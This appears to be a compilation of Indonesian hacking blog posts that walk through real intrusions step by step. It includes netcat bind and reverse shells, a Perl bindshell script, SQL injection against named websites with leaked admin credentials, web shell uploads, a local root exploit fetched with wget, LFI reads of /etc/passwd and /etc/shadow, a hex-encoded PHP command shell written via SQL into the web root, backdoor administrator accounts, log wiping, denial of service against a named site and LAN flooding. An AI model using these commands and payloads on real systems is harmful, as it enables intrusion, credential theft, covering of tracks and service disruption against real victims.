Kalau komputer sasaran os nya adalah windows, kita bisa menambahkan option –d ketika ngebind. Option ini bisa mengirimkan aplikasi cmd.exe melalui telnet. Sehingga kita bisa menggunakan telnet untuk remote connection. Implementasi ip 192.168.10.30 ber-OS winduz.

nc –vlp 7777 –e cmd.exe –d

Now try connect using telnet.

D:\HACK> telnet 192.168.10.30 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator> << console on remote host
C:\Documents and Settings\Administrator> ipconfig
Windows IP Configuration
Local Network Connection :
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.30 << ip sasaran
        Subnet Mask . . . . . . . . . . . : 255.255.255.255
        Default Gateway . . . . . . . . . : 192.168.10.100
C:\Documents and Settings\Administrator>

Perhatikan ketika kita jalankan command ipconfig, bukan ip kita yang terlihat, tapi ip sasaran. Ini karena kita memang berada di console sasaran. Sampai disini, kita sudah dapat console secara interaktif ke komputer sasaran kita, dimana kita bisa se-enaknya menjalankan command-commnd ke server secara interaktif. Untuk mengakhiri mode console, cukup tekan ctrl+c atau exit.

[b]Bindshell.pl (Aplikasi perl khusus bindshell)[/b]

Cara lain untuk bindshell adalah menggunakan aplikasi perl. Aplikasi ini di tulis khusus untuk melakukan bindshell dengan menjalankan service /bin/bash. Kita tidak perlu lagi men-setting aplikasi apa yang akan di jalankan. Bindshell.pl cukup baik dan mudah, namun juga perlu aplikasi perl untuk menjalankanya. Jika user yang kita pakai tidak punya akses ke perl, bindshell.pl tidak bisa digunakan. Bagaimana mengecek apakah kita bisa jalankan perl? Cukup ketik perl –v. Langsung in action.

Seperti biasa, masuk direktory yg writeable atau langsung /tmp. Download bindshell.txt dari host kamu. Kok bindshell.txt, bukan bindshell.pl? iya, Cuma extensi. Hal ini menghindari error ketika mendownload. Jadi upload bindshell.pl dengan extensi .txt. terakhir, langsung bind gak pake lama.

Command bindshell nya: perl bindshell.txt [port]

cd /tmp
lwp-download http://hacking.tool/bindshell.txt
perl bindshell.txt 9898 & 

Sip. Dari sini, kita udah bisa ngecek pakek telnet apakah konek or kagak. Bindshell.pl bersifat continue, jadi kita bisa berkali-kali konek dengan sekali ngebind, asalkan proses tidak di kill oleh admin.


Apa berikutnya? Jelas, remote connection to get remote interactive console. Tetep pake netcat.

D:\HACK>nc -vv 192.168.10.10 9898
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 9898 (?) open
bash: no job control in this shell
bash-3.2$ id
uid=100(mysql) gid=101(mysql) groups=101(mysql) context=user_u:
bash-3.2$ pwd
/tmp
bash-3.2$ uname -a
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST
2007 i686 i686 i386 GNU/Linux

Berikut adalah code untuk bindshell (perl).

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
    accept(CONN,S);
    if(!($pid=fork))
    {
        die "Cannot fork" if (!defined $pid);
        open STDIN,"<&CONN";
        open STDOUT,">&CONN";
        open STDERR,">&CONN";
        exec $SHELL || die print CONN "Cant execute $SHELL\n";
        close CONN;
        exit 0;
    }
}

[POC] SQL injection to Root Part 2

heheheh lanjut dah, ga tau ane mu bilang apa lagi, maklum cupu abis :D

target
[url=http://www.pubbkk.com]http://www.pubbkk.com[/url]
langkah 1 (karna udah ada ada tool jadi males nginject manual) :)


pake tool kerinci versi 0.7 download di [url=http://kerinci.net]kerinci.net[/url]
http://www.pubbkk.com/view_detail.php?id=103/**/AND/**/__TIME__=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/__CODE__--

[pubbkk]
admin           : id,count,password,email,date
yakuzakiku : yakuza2529 : yakuza2529 : 2007-04-05
login disini

[url=http://www.pubbkk.com/admin/]http://www.pubbkk.com/admin/[/url]

upload shell

kemudian explore dulu
ni shellnya
http://www.pubbkk.com/wenkhairu.txt
http://www.pubbkk.com/upload/girls/thumb_92x52/1.php
time to get root bebe :)

cek kerenel linux
uname -a

Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686 GNU/Linux
browsing local root exploit dan download
wget http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
cek ketersedian perl dan gcc
whereis perl
whereis gcc
perl: /usr/bin/perl /usr/bin/perl.my /etc/perl /usr/lib/perl /usr/bin/X11/perl /usr/bin/X11/perl.my /usr/local/lib/perl /usr/share/perl /usr/share/man/man1/perl.1.gz

gcc: /usr/bin/gcc /usr/lib/gcc /usr/bin/X11/gcc /usr/share/man/man1/gcc.1.gz
lakukan backconnect

untuk backconnect caranya bisa liat thread bro wisdom di sini [url=http://forum.devilzc0de.org/thread-2741.html]http://forum.devilzc0de.org/thread-2741.html[/url]
kalo udah siapin netcat di PC lo, trus listening port
wenkhairu@localhost:$ nc -vlp 12345
listening on [any] 12345 ...
kalo mau pake netcat di server target juga ndak apa2

caranya


download netcat
wget http://www.net-security.org/dl/software/netcat-0.7.1.tar.bz2
install netcat di target
tar -jxvf netcat-0.7.1.tar.bz2
cd /netcat-0.7.1
./configure
./make
./nc –vv [IP_KITA] 12345 –e /bin/bash
wenkhairu@localhost:$./ nc -vlp 12345
listening on [any] 12345 ...
connect to [180.214.232.22] from (UNKNOWN) [61.19.242.241] 12345
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686
pake exploit local root dari hasil connect


so we are root now

segitu dolo, silahkan di explore lagi ye, maaf ndak pake gambar ga sempat ng capture udah ngantuk soalnya :)

ane mu bobo dulu heheheh
happy rooting dude

Jumat, 06 Agustus 2010

Blind SQLi vs SQLi

hi kawan², maaf kalo turornya cupu naget ya, ane cuman mu berbagi aja, mungkin sebelumny ane pernah membahas tentang perbedaan SQL injection standar dan Blind SQL injection di sini , nah sekarang ane mau coba jelaskan beserta dengan gambarnya biar mudah untuk di pahami perbedaan yang mendasar pada kedua Teknik Attack web tersebut, :)
seperti yang udah kita tau kalo SQl injection itu menginjection kan code SQL ke dalam Url sebuah website untuk mendapatkan data² rahasia :D nah kadang² saat kita melakukan pentes ke sebuah situs kita menemukan beberapa hal seperti muncul pesan error dan tidak munculnya pesan error, ini membuat bagi sebagaian dari kita bingung :D sebenranya ntu situs vuln SQL atau edak he..he..he….lanjut dah … Tapi ane saranin mending baca dulu dulu artikel ane yang sebelumnya biar mudah untuk memahaminye :)

BLIND SQL INJECTION
Memberikan Magic_quota di URL untuk menguji vuln Blind SQLinjection
=================================================
memberikan keadaan yang bernilai TRUE
=================================================
Menjadikan keadaan FALSE
=================================================
Uniun Select untuk cari angka keberuntungan
==================================================
SQL INJECTION

==================================================

==================================================

==================================================

==================================================
akhir kata, ane minta maaf ama yang punya site :) , maaf ya pak sitenya jadi target pentest, silahkan di patch :)

Perbedaan SQLinjection dan Blind SQL injection

What is Blind SQL Injection?
sebelum lanjut kita pastikan dulu bahwa SQLinjection adalah metode hacking yang memungkinkan seorang penyerang yang tidak sah untuk mengakses isi dari database server Smile
seorang attacker biasanya melakukan pentest dengan memberikan masukan agar database server memberikan SQL query yang tidak valid (error), dengan munculnya pesan error si attacker akan mempelajari pesan error tersebut sehingga mendapatkan inforamsi2 yang lebih untuk melakukan tahapan pentest berikutnya, jika sebuah web tidak menimbulkan pesan error bukan berarti web tersebut bebas dari vuln SQL iinjection, tetapi masih mungkin terkena Blind SQL injection

mendeteksi Blind SQL injection
sudah pasti sebuah aplikasi web menggunakan SQL query untuk mengambil data dari database server, dan biasanya menggunaka kalusa WHERE pada bagian-bagian tertentu
http://www.korban.com/berita.php?id_berita=5
pernyataan SQL di atas kurang lebih begini
SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5
dalam keadaan normal maka server akan mengirmkan kembali hasil pengambilan data dari server tanpa error, untuk menetukan apakah itu vuln terhadap Blind SQLinjection attacker akan melakukan injection pada kalusa WHERE misalnya
http://www.korban.com/berita.php?id_berita=5 AND 1=1
maka database server akan melakukan perintah
SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=1
jika tidak ada pesan error atau tampilan web persis seperti semula maka masih mungkin terkena Blin SQL injection Smile , karena jika tu web aman maka seharusnya perintah SQL itu ndak di jalanin, kemudian si attacker akan menguji untuk memastikan vuln terhadap Blind SQL injection apa tidak dengan memberikan perintah SQL berupa keadaan false Smile
http://www.korban.com/berita.php?id_berita=5 AND 1=2
maka database server akan mengeksekusi perintah
SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=2
ini akan menyebab error tipe karena pada dasarnya memang 1 tidak sama dengan 2 Smile dan pada halaman web tidak akan di tampilkan berita yang dicari alias halama kosong tetapi tidak ada pesan error yang muncul Smile untuk exploitasi selanjutnya ya tidak jauh berbeda dengan SQL injection standar hanya awalnya saja yang berbeda. Smile
semoga membantu ya Smile

Domain g0t Hacked

ane bingung mau mulai dari mana soalnya ngerjainnya juga sambil bingungan he..he..he…
mungkin kalo deface website sih udah pada tau ya bijimana nah bijimana kalo nge-deface ftp …..???? ane nybui-nyubi sambil ngantuk2 ndak tau ini bia di bilang deface ftp apa bukan …he..he..he…
coba aja ke sini deh
################################
masuk pake
Code:
username=#####
password=#######
setelah ane telusuri yang punya ntu ini
Domain Information
Domain Name :#######
Organization :########
Registrant type : BUMN
jangan lapor ama Polisi ya ntar adek kecil roy sukro ngadu lagi…wkwkwkwkwk

sebenarnya ntu bolongnya udah sadis banget Smile ndak tau kok ndak di patch atau emang adminnya males
dari sekian banyak jalan menuju neraka xixixi ane ngambil jalan salah satunya Big Grin
mungkin ni dah pada tau semua, soalnya bugs lama nad dah ndak banyak yang pake lagi
karena make Apache versi jadul dan trus ndak pernah di upgrade makanya kebobolan Smile
oke gini deh
pertama kita scan dulu pake web scanner yang ente2 semua punya ane make Acunetix 6 interprise edition
nah ane scan deh ntu, lama juga nunggunya, trus hasilnya gini
( Maaf gambar terpaksa saya hapus, karena sesuatu hal :D )
nah ane tertarik ama yang nomor 1 dan 2 Smile
untuk no 1 Apache Mod_Rewrite ntu nunjukin kalo kita bisa nge-DOS dan tidak nutup kemungkinan bisa juga ngelakuin code-execution
kalo untuk masalah ngedos mah udah ada om yang khusus di forum kita ini Smile
trus udah kek gitu kan kita dah tau tu bisa gitu kita googling deh cari exploitnya milw0rm
dah gitu kita jalanin tu exploitnya

wenkhairu@ubuntu$ ./apache 203.77.225.45
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned

alo dah gini kan terserah mo di apain Smile
nah untuk yang ke-2 kan kenanya di Zend hashnya, itu juga sama ane kurang bisa menjelsakan soalnya Smile maklumlah masih cupu Smile
vulny juga hampir sama yaitu Code Excetuion atau sejenisnya lah karena emang untuk versi ntu vuln dan exploitnya dah banyak yang tau Smile
coba kesini deh PHP Zend_Hash_Del_Key_Or_Index pasti langsung ngerti deh

Root LFI (Local File Inclusion)

ane coba jelasin ya dikit, soalnya ane juga super nubi dalam hal ginian,
intinya kan cuman ngeroot ya, sebenrya sih ini vuln terhadap Local File Inclusion atau LFI ,
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

include();
include_once();
require();
require_once();
Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,
kek gini mungkin kalo di url
http://www.situs.com/index.php?hal=home.php
itu artinya script itu akan memanggil file home.php
nah disini attacker akan dapat melakukan LFI karena variable hal di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser.
kita bisa menggunakan metode menebak struktur folder dalam website target
tapi seandainya terdapat error seperti di bawah ini:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti i
nah kalo udah gini untuk dapat mengelabui script itu kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti
http://www.situd.com/index.php?hal=../../../../../../../../../etc/passwd
tanda untuk menghilangkan karakter apapun setelah passwd.
kata para hacker ini disebut null injection.
nah trus apa hubunganya ama yang ane posting mungkin jadi pertanyaan besar buat semua , maklum ane juga nubi soalnya, jadi gigi eh gan …
setelah kita dapet site dengan vuln LFI dan melakukan injection nya kek yuang di jelasin tadi itu maka
kita akan dapet sederetan file yang sudah tentu inti dari semua pertanyaan kan
file itu merupakan sederetan informasi user account pada OS varian Linux yang berisi informasi tentanfg username dan password user yang di pisahkan dengan baris, setiap barisnya itu mengandung
Username = username dari ketikan user yang login
Password = berisi password user yang di Encrypsi
contoh isi filenya kan gini
root:x:0:0:root:/root:/bin/bash
basris di atas menunjukan root user dengan password di shadow (kalo ada baris root:x:0:0 ) ada huruf “x” itu berarti passwordnya di shadow, kalo di shadow tinggal ganti gini ../../etc/shadow maka hasil yang kita peroleh akan berbeda misal seperti
root:snx54dbsnagdgd65dbsd:0:0:root:/root:/bin/bash
baris di atas menunjukan kalo password di encript dengan user root UID dan GID nya 0
dan user root mempunyai directory /root/ dan menggunkaan shell /bin/bash di linux
eh hampir lupa UID=userid kalo GID=Group id
yg bisa dliat dari etc/passwd ada
-avahi (networking)
-rpc (remote procedure call)
-daemon penghubung kernel dg hardware dgn sistem dbus
-nama user yg menjalankan
hal info lainnya
/etc/hosts
/var/log/access_log ( ini log file apache yg jika tdk dipatch bisa dieksploitasi utk nanem shell di sana
/proc/cpuinfo ( informasi cpu misal)
/proc/stat (info partisi)
/etc/issue ( info versi os dan kernel )
/etc/fstab ( dev dinamis yg terpasang )
semoga membantu ya ….
untuk exploitasi tanya ama master2 yang jago hacking ….

SQL RemoteDekstop

Auhtor : kiddies_code
email : crasher_1412 [at] yahoo [com]
waduh mugkin ada sebagian yang sudah tahu masalah ini (SQL RemoteDekstop), jadi maaf aja yach kalau
saya sok tahu, buat para om tutor saya jangan diketawain y, maklum saya cuma script kiddie disini.
langsung aja yach, sebenarnya konsep dalam meremote dekstop dengan SQL sama saja, hanya saja ada yang
kita rubah sedikit syntak dari SQlnya.
===========
PERTAMA
===========
untuk langkah pertama, pastinya kita mencari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada Dosen Google,he5x, maklum tempat
kuliah w kadang diwarnet..Tongue
===========
KEDUA
===========
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari web tersebut
(memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan dimintai alamat IPnya)
===========
KETIGA
===========
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang bermasalahnya(Metode
SQL Injection), misalkan kita dapet kolom 1
192.168.0.1/index.php?=-1+union+select+1–
kemudian cari versinya
192.168.0.1/index.php?=-1+union+select+version()–
disini saya baru melakukan pada SQL yang versi 5.x
===========
KEEMPAT
===========
ganti kolom yang bermasalah dengan
192.168.0.1/index.php?=-1+union+select+load_file(‘c:/boot.ini’)–
perintah load_file(‘c:/boot.ini’) digunakan untuk memanggil informasi boot dalam komputer korban
===========
KELIMA
===========
setelah itu kita convert
system($_get['CMD'])
kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e
===========
KEENAM
===========
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3 ​e+into+dumpfile+’c:/xampp/htdocs/cmd.php’–
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e >> conversian dari
+into+dumpfile+ >> untuk membuat file kedalam server
c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda ‘\’ diubah menjadi ‘/’), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php
===========
KETUJUH
===========
ubh URL menjadi
192.168.0.1/cmd.php?cmd=dir
maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban
==========
KEDELAPAN
===========
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa
ketikan pada URL
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add
net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password baru dalam system komputer
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add
net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah administrator dalam system komputer
=========
KESEMBILAN
=========
ketikan pertintah pada run >> mstsc
=========
KESEPULUH
==========
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak….
kalau cupu tutornya maaf banget dan kalau kurang lengkap POCnya w minta maaf juga, coz w sendiri ge belajar
makasihnya buat temen2 w yang mau belajar bareng…

Remote dos Sploit Testing

this is a remote sploit testing from 1 box only not a ddos dont worry just a remote kill testing.
Ok as usual as always just for testing sploit sorry bro, this isn’t a permanent just for testing remote sploit on apache server at http://www.podzemlje.net (on of the top Balkan Hack community). and i do this from one of my rooted box only
as always i use my magic rooted box to run this sploit:

root@bt:/root# ssh mysql@xxxxxxx -p xxxx
mysql@xxxxxxx's password:
Last login: Wed Jan 20 15:50:39 2010 from xxxxxxx
-bash-3.00$ cd /usr/include/...
-bash-3.00$ cd sploit2009
-bash-3.00$ ./sock1
sh-3.00# cd ..
sh-3.00# ./van mysql localhost ip

utmp target processed.
wtmp target processed.
lastlog target processed.
Processing /var/log/messages DONE.
Processing /var/log/secure DONE.
Processing /var/log/xferlog DONE.
Processing /var/log/maillog DONE.
Processing /var/log/warn Couldn't open /var/log/warn
Processing /var/log/mail DONE.
Processing /var/log/httpd.access_log Couldn't open /var/log/httpd.access_log
Processing /var/log/httpd.error_log Couldn't open /var/log/httpd.error_log
mv: cannot stat `warn.hm': No such file or directory
mv: cannot stat `httpda.hm': No such file or directory
mv: cannot stat `httpde.hm': No such file or directory
V_A_N_I_S_H_E_D_!
Your tracks have been removed
Exiting programm !!
sh-3.00# ./sleep_while_wisdom_online http://www.podzemlje.net
Making fooking apache at http://www.podzemlje.net sleep while u online mr wisdom .. please wait...
And here’s the magic :
the server at http://www.podzemlje.net can be killed every time I wanna kill
By :Mywisdom

flooding jaringan

flooding artinya banjir, jadi ini teknik untuk membanjiri jaringan dengan data yang tidak berguna sehinga sebuah jaringan menjadi lemot alias lambat ga karuan heheheh, bisa di coba di warnet lah atao dimanapun, tapi resiko tanggung sendiri ye….
download toolsnya
kalau udah download lang sung aja hajar hehehehehe
1 .buka file lan attacker yang tadi di download

terus langsung klik install…nah kalau udah selesai install baru klik attack

2. setelah terbuka programnya terus klik scan

3. kemudian klik option – adapter buat setting file seberapa gede yang mau dikirim ke komputer target
4.nah dah selesai setting konfigurasinya kita langsung aja floodin target kebetulan yang mau ane isengin komputer no 4 dengan ip 192.168.1.14
setelah itu ceklist di ip tersebut terus klik kanan kemudian klik flood

5. kemudian lihat hasil dikomputer korban

hehheheh…..ne hanya untuk pembelajaran..tinggal di explore lagi biar tambah ajib….. ok

ShoutMix chat widget